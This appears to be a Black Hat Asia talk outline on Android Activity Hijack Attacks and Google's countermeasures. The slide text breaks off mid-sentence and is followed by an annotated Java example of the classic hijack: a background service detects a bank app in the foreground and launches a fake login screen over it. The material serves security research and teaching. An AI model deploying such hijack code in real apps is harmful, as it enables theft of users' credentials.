SystemUI As EvilPiP: The Hijacking Attacks on Modern Mobile Device
WeiMin Cheng, Yue Liu
#BHASIA BlackHatEvents

Who Are We
- WeiMin Cheng, QI-ANXIN. Github: MG1937, Twitter: MGAldys4
- Yue Liu, QI-ANXIN. Github: lieanu
- Mobile & AOSP binary researchers

Agenda
- What is Activity Hijack Attack (AHA)
- Restrictions and policies released by Google
- Bypass security policies
- Video demo for the full chain
- BAL restriction
- Runtime state leak
- Strictly LMKD

What is AHA
- Activity Hijack Attack (AHA): almost zero cost and easy to exploit
- Hijack the target app to steal sensitive data or runtime privilege
- Used by adware, BankBot, ransomware and RATs

How AHA Works
- Take Android 4.0 as an example: the case of Simplocker, malware for Android 4.0
- The essence is abusing the NEW_TASK flag to seize the foreground (FG) task
- [Slide shows a code snippet of Simplocker]
- The malicious activity enters the FG task; the previous task is pushed to the background (BG)
- Now the malware can forge the trusted app: a StrandHogg-like hijack scheme
- Why must the FG task be seized for the hijack?

Task and Back-Stack
- A task stack is a collection of activities
- The user can only interact with ONE front task (in most cases)

Classic Attack Scheme
- Low cost, high return
- Affects almost all apps on old devices

Key Factors of AHA
- Background Activity Launch (BAL)
- Target running-state detection
- Background persistent process

Google will not allow this to happen

Restriction 0x1: No Leak State
- getRunningTasks | getRunningAppProcesses requires
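The classic Android 4.x scheme described in the "How AHA Works" and "Key Factors of AHA" slides, written out as an added illustrative example. This is not Simplocker's code and not code from the speakers; the target package name, the look-alike activity class and the polling interval are assumptions. The three key factors map onto the three methods: running-state detection via getRunningTasks(), the background activity launch with FLAG_ACTIVITY_NEW_TASK, and a sticky service as the persistent background process.

```java
// Added illustrative example of the classic AHA loop on Android 4.x.
// Not Simplocker's code. Package/class names and the poll interval are hypothetical.
// On Android 4.x the manifest must also declare android.permission.GET_TASKS.
import android.app.ActivityManager;
import android.app.Service;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.os.Handler;
import android.os.IBinder;
import android.os.Looper;
import java.util.List;

public class HijackService extends Service {
    // Hypothetical victim app and the attacker's look-alike activity.
    private static final String TARGET_PKG = "com.example.bank";
    private static final String FAKE_ACTIVITY = "com.example.adware.FakeLoginActivity";
    private static final long POLL_MS = 500;

    private final Handler handler = new Handler(Looper.getMainLooper());
    private final Runnable poll = new Runnable() {
        @Override public void run() {
            if (isTargetInForeground()) {
                seizeForegroundTask();
            }
            handler.postDelayed(this, POLL_MS);
        }
    };

    // Key factor: target running-state detection.
    // Android 4.x lets any app with GET_TASKS read the top task of every app.
    // From Android 5.0 getRunningTasks() returns only the caller's own tasks
    // (plus a few non-sensitive ones such as home), so this never matches the
    // victim and the attack chain stops here; that is the "No Leak State" restriction.
    boolean isTargetInForeground() {
        ActivityManager am = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
        List<ActivityManager.RunningTaskInfo> tasks = am.getRunningTasks(1);
        if (tasks == null || tasks.isEmpty()) return false;
        ComponentName top = tasks.get(0).topActivity;
        return top != null && TARGET_PKG.equals(top.getPackageName());
    }

    // Key factor: background activity launch (BAL).
    // FLAG_ACTIVITY_NEW_TASK creates a new task for the look-alike activity and
    // brings it to the front; the victim's task is pushed to the background and
    // the user sees the forged screen (StrandHogg-like scheme). From Android 10
    // the BAL restrictions block this startActivity() from a background service.
    void seizeForegroundTask() {
        Intent i = new Intent();
        i.setClassName(this, FAKE_ACTIVITY);
        i.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        startActivity(i);
    }

    // Key factor: a persistent background process. START_STICKY asks the system
    // to recreate the service if it is killed, keeping the polling loop alive.
    @Override public int onStartCommand(Intent intent, int flags, int startId) {
        handler.removeCallbacks(poll);
        handler.post(poll);
        return START_STICKY;
    }

    @Override public void onDestroy() {
        handler.removeCallbacks(poll);
        super.onDestroy();
    }

    @Override public IBinder onBind(Intent intent) {
        return null;
    }
}
```

Each of the three methods is exactly the step that Google later restricted: the detection step is what the 5.0/5.1 changes to getRunningTasks() and getRunningAppProcesses() (which from 5.1.1 returns only the caller's own process) remove, the launch step is what the Android 10 BAL restriction blocks, and the persistent process is what an aggressive low-memory killer (LMKD) policy targets. The rest of the deck is about how each of these is bypassed on modern devices.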